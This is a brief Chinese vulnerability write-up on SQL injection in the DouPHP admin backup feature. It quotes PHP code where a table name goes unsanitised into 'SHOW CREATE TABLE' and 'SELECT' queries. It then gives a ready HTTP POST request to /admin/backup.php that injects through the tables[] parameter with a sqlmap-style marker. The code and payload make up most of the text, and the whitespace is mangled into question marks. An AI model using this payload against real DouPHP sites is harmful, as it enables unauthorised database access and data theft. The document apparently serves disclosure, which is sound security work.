douphp后台注入

 ???for($i = $tableid; $i < $tablenumber && strlen($sqldump) < $vol_size * 1024; $i++) { ???????$sqldump .= $backup->sql_dumptable($tables[$i], $vol_size, $startfrom, strlen($sqldump)); ???????$startfrom = 0; ???}

 ??function sql_dumptable($table, $vol_size, $startfrom = 0, $currsize = 0) {$offset = 100; ???????if (!$startfrom) { ???????????$tabledump = "DROP TABLE IF EXISTS `$table`;\n"; ??????????// die("SHOW CREATE TABLE $table"); ???????????$createtable = $GLOBALS[‘dou‘]->query("SHOW CREATE TABLE $table"); ???????????$create = $GLOBALS[‘dou‘]->fetch_array($createtable); ???????????$tabledump .= $create[1] . ";\n\n"; ???????????if ($GLOBALS[‘dou‘]->version() > ‘4.1‘ && $this->sqlcharset) { ???????????????$tabledump = preg_replace("/(DEFAULT)*\s*CHARSET=[a-zA-Z0-9]+/", "DEFAULT CHARSET=" . $this->sqlcharset, $tabledump); ???????????} ???????} ???????$tabledumped = 0; ???????$numrows = $offset; ???????while ($currsize + strlen($tabledump) < $vol_size && $numrows == $offset) { ???????????$tabledumped = 1; ???????????//die("SELECT * FROM $table LIMIT $startfrom, $offset"); ???????????$rows = $GLOBALS[‘dou‘]->query("SELECT * FROM $table LIMIT $startfrom, $offset"); ???}

POST /admin/backup.php?rec=backup HTTP/1.1tables%5B%5D=dou_admin where 1=1*#&startfrom=1&file_name=D20171110T165601&vol_size=2048&token=5c9a08d0&totalsize=119&submit=%E7%A1%AE%E5%AE%9A%E5%A4%87%E4%BB%BD